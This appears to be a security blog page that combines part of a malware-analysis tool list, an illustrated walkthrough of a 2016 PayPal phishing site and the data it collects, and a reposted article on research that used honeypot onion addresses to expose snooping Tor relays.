  • X64dbg – An open-source x64/x32 debugger for windows.


Analyze network interactions.

  • Bro – Protocol analyzer that operates at incredible scale; both file and network protocols.
  • CapTipper – Malicious HTTP traffic explorer.
  • chopshop – Protocol analysis and decoding framework.
  • Fiddler – Intercepting web proxy designed for “web debugging.”
  • Hale – Botnet C&C monitor.
  • INetSim – Network service emulation, useful when building a malware lab.
  • Malcom – Malware Communications Analyzer.
  • Maltrail – A malicious traffic detection system, utilizing publicly available (black)lists containing malicious and/or generally suspicious trails and featuring an reporting and analysis interface.
  • mitmproxy – Intercept network traffic on the fly.
  • Moloch – IPv4 traffic capturing, indexing and database system.
  • NetworkMiner – Network forensic analysis tool, with a free version.
  • ngrep – Search through network traffic like grep.
  • Tcpdump – Collect network traffic.
  • tcpick – Trach and reassemble TCP streams from network traffic.
  • tcpxtract – Extract files from network traffic.
  • Wireshark – The network traffic analysis tool.

Memory Forensics

Tools for dissecting malware in memory images or running systems.

  • DAMM – Differential Analysis of Malware in Memory, built on Volatility
  • FindAES – Find AES encryption keys in memory.
  • Muninn – A script to automate portions of analysis using Volatility, and create a readable report.
  • Rekall – Memory analysis framework, forked from Volatility in 2013.
  • TotalRecall – Script based on Volatility for automating various malware analysis tasks.
  • VolDiff – Run Volatility on memory images before and after malware execution, and report changes.
  • Volatility – Advanced memory forensics framework.
  • WinDbg – Live memory inspection and kernel debugging for Windows systems.

Windows Artifacts

  • AChoir – A live incident response script for gathering Windows artifacts.
  • python-evt – Python library for parsing Windows Event Logs.
  • python-registry – Python library for parsing registry files.
  • RegRipper (GitHub) – Plugin-based registry analysis tool.

Storage and Workflow

  • Aleph – OpenSource Malware Analysis Pipeline System.
  • CRITs – Collaborative Research Into Threats, a malware and threat repository.
  • Malwarehouse – Store, tag, and search malware.
  • MISP – Malware Information Sharing Platform curated by The MISP Project.
  • Viper – A binary management and analysis framework for analysts and researchers.


  • DC3-MWCP – The Defense Cyber Crime Center’s Malware Configuration Parser framework.
  • Pafish – Paranoid Fish, a demonstration tool that employs several techniques to detect sandboxes and analysis environments in the same way as malware families do.
  • REMnux – Linux distribution and docker images for malware reverse engineering and analysis.
  • Santoku Linux – Linux distribution for mobile forensics, malware analysis, and security.



Essential malware analysis reading material.


Some relevant Twitter accounts.


Related Awesome Lists

Reference :github

Original Post:

Anatomy of Paypal Phishing Attack

The phishing email

The email header

Received: by with SMTP id u125csp1210882oia;
 Fri, 29 Jul 2016 04:32:30 -0700 (PDT)
X-Received: by with SMTP id t66mr661693wmt.41.1469791950832;
 Fri, 29 Jul 2016 04:32:30 -0700 (PDT)
Return-Path: <>
Received: from ( [])
 by with ESMTP id v66si3080759wmf.69.2016.
 for <>;
 Fri, 29 Jul 2016 04:32:30 -0700 (PDT)
Received-SPF: pass ( best guess record for domain of designates as permitted sender) client-ip=;
 spf=pass ( best guess record for domain of designates as permitted sender)
Received: by (Postfix, from userid 500)
 id 77A34104353; Fri, 29 Jul 2016 13:32:30 +0200 (CEST)
X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on
X-Spam-Status: No, score=-1.2 required=5.0 tests=BAYES_00,HTML_FONT_SIZE_HUGE,
X-Spam-Languages: en
Received: by (Postfix, from userid 35301)
 id 8681717C0278; Fri, 29 Jul 2016 13:32:23 +0200 (CEST)
Subject: Unusual activity in your account
X-PHP-Script: for
From: Security Team <>
MIME-Version: 1.0
Content-Type: text/html
Message-Id: <>
Date: Fri, 29 Jul 2016 13:32:23 +0200 (CEST)

The phishing Paypal site

Without https of course, my firefox shows that hosting in Germary


The phishing IP information


The phishing site registration information


Try to login the phishing site


Login failed. However the “My Paypal” and “Log out” button at right top corner don’t work


After press the Continue button, it will brings you to update credit/debit card


The phisher wants all your information, have to add billing address to next step


The billing address page


The phisher will ask for remaining information of you


Congratulations! You have submitted all necessary information to phisher


Finally, the phisher will bring you back to the real Paypal website.


Final Thought:

The phishing campaign website design and quality is good. Phisher looking for high quality of data, many fields with validation, the data collection flow is nice.

To avoid trap by those kind of phishing email is easy, the website without https, and the domain name is very easy to identify.

Researchers find over 100 spying Tor nodes that attempt to compromise darknet sites


When it comes to accessing public websites, Tor has an intrinsic security problem: though the nodes between your computer and the public internet are unable to see where the traffic is coming from or going to, the final hop in the network (known as an exit node) gets to know what webserver you are connecting to.

If that final hop isn’t protected by an HTTPS connection — if it takes place without encryption — then all the traffic between you and the webserver are an open book to the exit node. It can see what you send and what you receive, and it can tamper with the connection (for example, it can inject malicious code that exploits bugs in your browser to take it over). If your session includes identifying information — your Google cookie, say, or a login and password — then someone running a spying exit node can figure out who you are without having to poison your session. This was much more of a problem when HTTPS connections were more rare, but now, thanks to the Snowden revelations and projects like Let’s Encrypt, much of the web is encrypted by default. That means that a spying exit node will only be able to see which server is being accessed, but not which page, and will not be able to inject code into the session, and will not be able to see the data going to and from the server.

There aren’t many exit nodes out there. Many people fear that running an exit node will put them in police crosshairs if it gets used in the commission of a crime. For the record, Boing Boing runs a very high-capacity exit node, and though we’ve received multiple contacts from US law enforcement, we’ve just explained that this is a Tor node that runs with logging switched off, and thus we have no information that’ll be relevant to any investigations, and the officers involved have thanked us and gone away without further trouble.

The lack of exit nodes means that if you run an exit node and want to spy on people, you can see an appreciable fraction of all the Tor traffic that goes to and from the public internet. Many governments, including the Chinese government, are understood to be running high-availability exit nodes that snoop on and log all the traffic they can see.

One answer to this problem is Tor “hidden services.” These are servers that have no public internet address; rather, they are accessed directly through the Tor network, without traffic ever being routed through an exit node. Because all this traffic takes place in the Tor network, without the intermediate nodes ever getting access to decrypted information, the sessions are considered very secure. Notorious darknet sites like The Silk Road ran as hidden services, and many sites maintain hidden service versions of their public offerings: for example, Facebook can be accessed on the Tor network via https://www.facebookcorewwwi.onion/, which resolves to a machine in one of Facebook’s data centers in Oregon, which is then bridged into the rest of Facebook’s system. By accessing Facebook over a .onion hidden service, you can disguise the fact that you’re visiting Facebook at all, and bypass censoring firewalls, like those used by schools, employers and governments.

However, hidden services are not without their own security issues. A pair of security researchers from Northeastern University have announced a paper(to be delivered at this summer’s Def Con hacker convention in Las Vegas) that reveals over 100 spying Tor nodes that were shown to be targeting hidden services.

These nodes — ordinary nodes, not exit nodes — sorted through all the traffic that passed through them, looking for anything bound for a hidden service, which allowed them to discover hidden services that had not been advertised. These nodes then attacked the hidden services by making connections to them and trying common exploits against the server-software running on them, seeking to compromise and take them over.

The researchers used “honeypot” .onion servers to find the spying computers: these honeypots were .onion sites that the researchers set up in their own lab and then connected to repeatedly over the Tor network, thus seeding many Tor nodes with the information of the honions’ existence. They didn’t advertise the honions’ existence in any other way and there was nothing of interest at these sites, and so when the sites logged new connections, the researchers could infer that they were being contacted by a system that had spied on one of their Tor network circuits.

This attack was already understood as a theoretical problem for the Tor project, which had recently undertaken a rearchitecting of the hidden service system that would prevent it from taking place.

No one knows who is running the spying nodes: they could be run by criminals, governments, private suppliers of “infowar” weapons to governments, independent researchers, or other scholars (though scholarly research would not normally include attempts to hack the servers once they were discovered).

“We create what we call ‘honey onions’ or ‘honions.’ These are onion addresses that we don’t share with anyone,” Noubir said. If someone visits the sites, it’s a good indication that their service has been picked up by a malicious HSDir.

At any one time, the pair ran 4,500 honey onions over 72 days, and found at least 110 HSDirs spying on hidden services. Some of the actors behind these weren’t just passive observers; many came back and then aggressively probed the hidden services.

“They’re looking for vulnerabilities in the web server,” Sanatinia said. Those attackers might look for cross-site scripting attacks, SQL-injection vulnerabilities, or just try to find the server’s status page, which can reveal lots of interesting, and potentially identifying, information about the site.

Most of the dodgy HSDirs the researchers found were hosted in the US, followed by Germany, France, and then other European countries. Of course, that doesn’t necessarily mean their operators are based in the same country; anyone can whip up a remote server from pretty much anywhere in the world. And because over half of the 110 nodes were hosted on cloud infrastructure, it’s not easy to immediately pin down who’s behind them.

Honey Onions: Exposing Snooping Tor HSDir Relays [Guevara Noubir and Amirali Sanatinia/Def Con]

Over 100 Snooping Tor Nodes Have Been Spying on Dark Web Sites[Joseph Cox/Motherboard]

(Image: Red onion closeup , Ogre, Public Domain)

Original Post:

Blog at

Up ↑